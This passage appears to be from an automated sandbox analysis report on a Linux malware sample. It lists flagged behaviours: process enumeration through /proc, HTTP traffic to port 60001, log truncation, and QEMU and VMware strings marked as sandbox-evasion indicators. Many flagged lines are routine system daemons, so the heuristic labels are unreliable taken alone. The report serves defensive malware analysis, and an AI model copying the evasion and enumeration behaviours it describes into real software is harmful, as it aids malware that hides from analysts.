Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/2302/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/910/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5379/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/912/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/912/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/912/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5811/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/2307/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/2307/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/918/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/918/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/918/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5275/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5278/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5037/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5037/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1594/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5150/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1349/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1586/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1465/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1344/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1463/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/800/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/800/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/800/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/801/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/801/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/801/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1900/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/491/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/491/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/491/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5280/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5281/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1599/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1477/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1476/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1475/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1475/exe Jump to behavior
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /usr/sbin/invoke-rc.d (PID: 5235) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-enabled cups.service Jump to behavior
Source: /usr/sbin/invoke-rc.d (PID: 5241) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active cups.service Jump to behavior
Source: /usr/lib/rsyslog/rsyslog-rotate (PID: 5245) Systemctl executable: /usr/bin/systemctl -> systemctl kill -s HUP rsyslog.service Jump to behavior
Source: /lib/systemd/systemd (PID: 5907) Systemctl executable: /bin/systemctl -> /bin/systemctl --user set-environment DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/127/bus
Creates hidden files and/or directories
Source: /usr/bin/whoopsie (PID: 5373) Directory: /nonexistent/.cache Jump to behavior
Source: /usr/lib/policykit-1/polkitd (PID: 5443) Directory: /root/.cache Jump to behavior
Source: /usr/lib/gdm3/gdm-wayland-session (PID: 5529) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5508) Directory: /root/.cache Jump to behavior
Source: /usr/bin/whoopsie (PID: 5573) Directory: /nonexistent/.cache Jump to behavior
Source: /usr/lib/policykit-1/polkitd (PID: 5648) Directory: /root/.cache Jump to behavior
Source: /usr/bin/whoopsie (PID: 5684) Directory: /nonexistent/.cache
Source: /usr/lib/policykit-1/polkitd (PID: 5756) Directory: /root/.cache
Source: /usr/lib/gdm3/gdm-wayland-session (PID: 5796) Directory: /var/lib/gdm3/.cache
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5777) Directory: /root/.cache
Source: /usr/bin/whoopsie (PID: 5797) Directory: /nonexistent/.cache
Source: /usr/lib/policykit-1/polkitd (PID: 5875) Directory: /root/.cache
Source: /usr/bin/whoopsie (PID: 5916) Directory: /nonexistent/.cache
Source: /usr/lib/policykit-1/polkitd (PID: 5989) Directory: /root/.cache
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6013) Directory: /root/.cache
Source: /usr/bin/whoopsie (PID: 6026) Directory: /nonexistent/.cache
Sample tries to set the executable flag
Source: /usr/sbin/gdm3 (PID: 5502) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5502) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5508) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx) Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5508) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5773) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 5773) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5777) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5777) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
Source: /usr/sbin/gdm3 (PID: 6006) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 6006) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6013) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6013) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
Executes commands using a shell command-line interpreter
Source: /usr/sbin/logrotate (PID: 5232) Shell command executed: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log " Jump to behavior
Source: /usr/sbin/logrotate (PID: 5243) Shell command executed: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5459) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5461) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5463) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5465) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5467) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5469) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5472) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5474) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/share/language-tools/language-options (PID: 5520) Shell command executed: sh -c "locale -a | grep -F .utf8 " Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5640) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5644) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5649) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5654) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5657) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5660) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5667) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5672) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/share/language-tools/language-options (PID: 5783) Shell command executed: sh -c "locale -a | grep -F .utf8 "
Source: /usr/bin/gpu-manager (PID: 5876) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5884) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5887) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5890) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5892) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5898) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5901) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5905) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/share/language-tools/language-options (PID: 6020) Shell command executed: sh -c "locale -a | grep -F .utf8 "
Source: /usr/sbin/rsyslogd (PID: 5452) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5452) Log file created: /var/log/kern.log
Source: /usr/bin/gpu-manager (PID: 5458) Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5639) Log file created: /var/log/gpu-manager.log
Source: /usr/sbin/rsyslogd (PID: 5664) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5664) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5765) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5765) Log file created: /var/log/auth.log
Source: /usr/bin/gpu-manager (PID: 5874) Log file created: /var/log/gpu-manager.log Jump to dropped file
Source: /usr/sbin/rsyslogd (PID: 5889) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5889) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5998) Log file created: /var/log/kern.log Jump to dropped file
Source: /usr/sbin/rsyslogd (PID: 5998) Log file created: /var/log/auth.log Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 36712 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 36712 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 54592 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58692 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58692 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33338 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57906 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001

Malware Analysis System Evasion:

barindex
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pulseaudio (PID: 5375) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5496) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5635) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5678) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5749) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5868) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5913) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5983) Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/bin/find (PID: 5230) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5308) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/whoopsie (PID: 5373) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5375) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/agetty (PID: 5448) Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/rsyslogd (PID: 5452) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5458) Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/gdm3/gdm-session-worker (PID: 5525) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5571) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/whoopsie (PID: 5573) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5635) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5639) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/agetty (PID: 5659) Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/rsyslogd (PID: 5664) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5675) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/whoopsie (PID: 5684) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5749) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5762) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5765) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5772) Queries kernel information via 'uname':
Source: /usr/lib/gdm3/gdm-session-worker (PID: 5790) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5797) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5868) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5874) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5885) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5889) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5900) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5916) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5983) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5995) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5998) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 6004) Queries kernel information via 'uname':
Source: /usr/lib/gdm3/gdm-session-worker (PID: 6023) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 6026) Queries kernel information via 'uname':
Deletes log files
Source: /usr/sbin/logrotate (PID: 5190) Truncated file: /var/log/cups/access_log.1 Jump to behavior
Source: /usr/sbin/logrotate (PID: 5190) Truncated file: /var/log/syslog.1 Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5458) Truncated file: /var/log/gpu-manager.log Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5639) Truncated file: /var/log/gpu-manager.log Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5874) Truncated file: /var/log/gpu-manager.log
Source: 5239.20.dr Binary or memory string: -9915837702310A--gzvmware kernel module
Source: 5239.20.dr Binary or memory string: -1116261022170A--gzQEMU User Emulator
Source: 5239.20.dr Binary or memory string: qemu-or1k
Source: 5239.20.dr Binary or memory string: qemu-riscv64
Source: 5239.20.dr Binary or memory string: {cqemu
Source: 5239.20.dr Binary or memory string: qemu-arm
Source: 5239.20.dr Binary or memory string: (qemu
Source: 5239.20.dr Binary or memory string: qemu-tilegx
Source: 5239.20.dr Binary or memory string: qemu-hppa
Source: 5239.20.dr Binary or memory string: q{rqemu%
Source: 5239.20.dr Binary or memory string: )qemu
Source: 5239.20.dr Binary or memory string: vmware-toolbox-cmd
Source: 5239.20.dr Binary or memory string: qemu-ppc
Source: 5239.20.dr Binary or memory string: Tqemu9
Source: 5239.20.dr Binary or memory string: qemu-aarch64_be
Source: 5239.20.dr Binary or memory string: 0qemu9
Source: 5239.20.dr Binary or memory string: qemu-sparc64
Source: 5239.20.dr Binary or memory string: qemu-mips64
Source: 5239.20.dr Binary or memory string: vV:qemu9
Source: 5239.20.dr Binary or memory string: qemu-ppc64le
Source: 5239.20.dr Binary or memory string: <glib::param::uint64Glib::Param::UInt643pm315820097650A--gzWrapper for uint64 parameters in GLibx86_64-linux-gnu-ld.gold-1116112426130B--gzThe GNU ELF linkerprinter-profile-1115804162510A--gzProfile using X-Rite ColorMunki and Argyll CMSgrub-fstest-1116214898500A--gzdebug tool for GRUB filesystem driversxdg-user-dir-1115483406210A--gzFind an XDG user dirkmodsign-1115569251480A--gzKernel module signing toolsensible-editor-1115739932820A--gzsensible editing, paging, and web browsingminesMines6615854478170Cgnome-mines-gzinputattach-1115708189280A--gzattach a serial line to an input-layer devicegapplication-1116155671180A--gzD-Bus application launcherip-tunnel-8815816145190A--gztunnel configurationkoi8rxterm-1116140167530A--gzX terminal emulator for KOI8-R environmentsfoo2hiperc-wrapper-1115804162510A-tgzConvert Postscript into a HIPERC printer streamcryptsetup-reencrypt-8816002888050A--gztool for offline LUKS device re-encryptionsyndaemon-1115861716810A--gza program that monitors keyboard activity and disables the touchpad when the keyboard is being used.gslj-1115980290200B--gzFormat and print text for LaserJet printer using ghostscriptfile2brl-1115757179490A--gzTranslate an xml or a text file into an embosser-ready braille filexfdesktop-settings-1115793419820A--gzDesktop settings for Xfceua-1115856013570B--gzManage Ubuntu Advantage services from Canonicallatin4-7715812813670B--gzISO 8859-4 character set encoded in octal, decimal, and hexadecimalsane-genesys-5516003468200A--gzSANE backend for GL646, GL841, GL843, GL847 and GL124 based USB flatbed scannerspdftohtml-1115853266670A--gzprogram to convert PDF files into HTML, XML and PNG imagesbluetooth-sendto-1116015653360A--gzGTK application for transferring files over Bluetoothqemu-ppc64-1116261022170B--gzQEMU User Emulatorcache_metadata_size-8815811608350A--gzEstimate the size of the metadata device needed for a given configuration.net::dbus::exporterNet::DBus::Exporter3pm315773746310A--gzExport object methods and signals to the bussane-pint-5516003468200A--gzSANE backend for scanners that use the PINT device driverbpf-helpers7-7715812813670A--gzlist of eBPF helper functionsfull-4415812813670A--gzalways full devicelogin-1115906478670A--gzbegin session on the systemcups-snmp-8815877390340A--gzcups snmp backend (deprecated)ordchr-3am315728089600A--gzconvert characters to strings and vice versasosreport-1116092694050A--gzCollect and package diagnostic and support datatop-1115827827270A--gzdisplay Linux processesuri::_punycodeURI::_punycode3pm315811897880A--gzencodes Unicode string in Punycodettytty4tty1systemd-localed-8816268940210B--gzLocale bus mechanismlvmsadc-8815816289110
Source: 5239.20.dr Binary or memory string: vmware
Source: 5239.20.dr Binary or memory string: qemu-cris
Source: 5239.20.dr Binary or memory string: libvmtools
Source: 5239.20.dr Binary or memory string: qemu-m68k
Source: kern.log.300.dr Binary or memory string: Jan 15 00:09:27 galassia kernel: [ 575.026151] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 12/12/2018
Source: 5239.20.dr Binary or memory string: qemu-xtensa
Source: 5239.20.dr Binary or memory string: 9qemu
Source: 5239.20.dr Binary or memory string: qemu-sh4
Source: 5239.20.dr Binary or memory string: Dprezip-bin-1116269780060A--gzprefix zip delta word list compressor/decompressornameif-8815490444730A--gzname network interfaces based on MAC addressesxdg-user-dirs-update-1115483406210A--gzUpdate XDG user dir configurationip-link-8815816145190A--gznetwork device configurationhpsa-4415812813670A--gzHP Smart Array SCSI driverhd4-4415812813670A--gzMFM/IDE hard disk devicessane-canon630u-5516003468200A--gzSANE backend for the Canon 630u USB flatbed scannersg_copy_results-8815825816070A--gzsend SCSI RECEIVE COPY RESULTS command (XCOPY related)grub-macbless-8816214898500A--gzbless a mac file/directoryntfstruncate-8815568625640A-tgztruncate a file on an NTFS volumelessfile-1115936459130B--gz"input preprocessor" for less.sane-artec-5516003468200A--gzSANE backend for Artec flatbed scannersrmdir-1115676799200A--gzremove empty directoriessystemd-networkd-wait-online.service-8816268940210A--gzWait for network to come onlinemkfs.ntfs-8815568625640B-tgzcreate an NTFS file systemsg_inq-8815825816070A--gzissue SCSI INQUIRY command and/or decode its responseradattr.so-8815955079440Cpppd-radattr-gzc_rehash-1ssl116164130370B--gzCreate symbolic links to files named by the hash valuestc-htb-8815816145190A--gzHierarchy Token Bucketgvfs-open-1115868766090A--gzsg_rbuf-8815825816070A--gzreads data using SCSI READ BUFFER commandglib-compile-schemas-1116155671180A--gzGSettings schema compileropenssl-srp-1ssl116164130370B--gzmaintain SRP password fileopenssl-rehash-1ssl116164130370B--gzCreate symbolic links to files named by the hash valueslibvmtools-3315837702310A--gzvmware shared librarypasswd5-5515906478670A--gzthe password filenet::dbus::dumperNet::DBus::Dumper3pm315773746310A--gzStringify Net::DBus objects suitable for printingsane-hp4200-5516003468200A--gzSANE backend for Hewlett-Packard 4200 scannersposixoptions-7715812813670A--gzoptional parts of the POSIX standardnetworkmanager.confNetworkManager.conf5516002723180A--gzNetworkManager configuration fileownership-8815771238010A--gzCompaq ownership tag retrieveroakdecode-1115804162510A--gzDecode an OAKT printer stream into human readable form.gvfs-save-1115868766090A--gzmkfs.minix-8815953177680A--gzmake a Minix filesystemuri7-7715812813670A--gzuniform resource identifier (URI), including a URL or URNedit-1115714399500B--gzexecute programs via entries in the mailcap filegit-diff-files-1116148628880A--gzCompares files in the working tree and the index.ldaprc-5516136581350Cldap.conf-gzpactl-1116219586470A--gzControl a running PulseAudio sound servertempfile-1115756848240A--gzcreate a temporary file in a safe mannerhp-check-1115857238880A--gzDependency/Vers
Source: 5239.20.dr Binary or memory string: .qemu{
Source: 5239.20.dr Binary or memory string: qemu-ppc64abi32
Source: 5239.20.dr Binary or memory string: qemu-ppc64
Source: 5239.20.dr Binary or memory string: qemu-i386
Source: 5239.20.dr Binary or memory string: qemu-x86_64
Source: 5239.20.dr Binary or memory string: H~6\nqemu*q
Source: 5239.20.dr Binary or memory string: @qemu
Source: 5239.20.dr Binary or memory string: Fqqemu
Source: 5239.20.dr Binary or memory string: N4qemu
Source: 5239.20.dr Binary or memory string: ~6\nqemu*q
Source: 5239.20.dr Binary or memory string: qemu-mips64el
Source: 5239.20.dr Binary or memory string: hqemu
Source: 5239.20.dr Binary or memory string: &mqemu
Source: 5239.20.dr Binary or memory string: $qemu
Source: 5239.20.dr Binary or memory string: qemu-sparc
Source: 5239.20.dr Binary or memory string: qemu-microblaze
Source: 5239.20.dr Binary or memory string: qemu-user
Source: 5239.20.dr Binary or memory string: qemu-aarch64
Source: 5239.20.dr Binary or memory string: qemu-sh4eb
Source: 5239.20.dr Binary or memory string: iqemu
Source: 5239.20.dr Binary or memory string: qemu-mipsel
Source: 5239.20.dr Binary or memory string: qemuP`
Source: 5239.20.dr Binary or memory string: qemu-alpha
